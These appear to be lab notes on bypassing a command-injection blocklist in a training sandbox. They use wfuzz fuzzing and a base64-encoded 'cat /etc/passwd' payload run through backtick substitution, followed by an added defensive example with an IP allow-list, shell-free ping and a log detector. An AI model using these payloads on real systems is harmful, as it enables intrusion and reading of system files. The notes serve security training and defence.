Enumerate Blocklist:

  1. First use wfuzz to fuzz the parameter: wfuzz -c -z file,/home/kali/oswa/commandinjection/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

  2. Use --hh to hide responses whose length matches a failed attempt (1156 characters here): wfuzz -c -z file,/home/kali/oswa/commandinjection/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

  3. Repeat step 2 until you see one that works.

Base64 Encode: (requires backtick ` command substitution)

  1. Run this on our attacker machine first: echo "cat /etc/passwd" | base64

  2. Use the base64-encoded string as the payload: ;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

  3. Alternatively, if the base64 binary is not available:
     `echo -n "d2hvYW1p" | openssl base64 -d -A`
     `echo -n "d2hvYW1p" | python3 -m base64 -d`
     `echo -n "d2hvYW1p" | perl -MMIME::Base64 -ne 'print decode_base64($_)'`
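Added example (not from the original notes or the ci-sandbox app): the fix for the blocklisted.php pattern above is an allow-list on the ip parameter plus running ping without a shell, and a log check for the backtick/base64-decode pattern these notes rely on. The function names, the log format and the sample log lines are constructed for this example.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional
from urllib.parse import unquote


def vet_ip_param(raw_query_value: str) -> Optional[str]:
    """Decode the query value as the web server would, then accept it only if it
    parses as an IPv4/IPv6 literal. A deny list of shell metacharacters can never
    enumerate every bypass (the notes above fuzz for the gaps); an allow list
    does not have to."""
    try:
        return str(ipaddress.ip_address(unquote(raw_query_value).strip()))
    except ValueError:
        return None


def build_ping_argv(raw_query_value: str) -> Optional[List[str]]:
    """Return an argv list for ping, or None when the input is not an IP.
    A list passed to subprocess.run without shell=True is one argument per
    element, so ';', backticks and a base64-wrapped command are inert."""
    ip = vet_ip_param(raw_query_value)
    return None if ip is None else ["ping", "-c", "1", ip]


def run_ping(raw_query_value: str) -> str:
    argv = build_ping_argv(raw_query_value)
    if argv is None:
        return "rejected: not an IP address"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return done.stdout


# Detection side: flag requests whose URL-decoded query string carries command
# substitution or a base64 decode step (the exact patterns listed above).
SUSPICIOUS = re.compile(r"`|\$\(|base64\s+-d|openssl\s+base64\s+-d|MIME::Base64")

# Constructed sample access-log lines (combined log format, assumed).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /php/blocklisted.php?ip=127.0.0.1 HTTP/1.1" 200 1156',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d` HTTP/1.1" 200 2048',
]


def suspicious_requests(log_lines: List[str]) -> List[str]:
    """Return the log lines whose decoded request target matches SUSPICIOUS."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and SUSPICIOUS.search(unquote(m.group(1))):
            hits.append(line)
    return hits
```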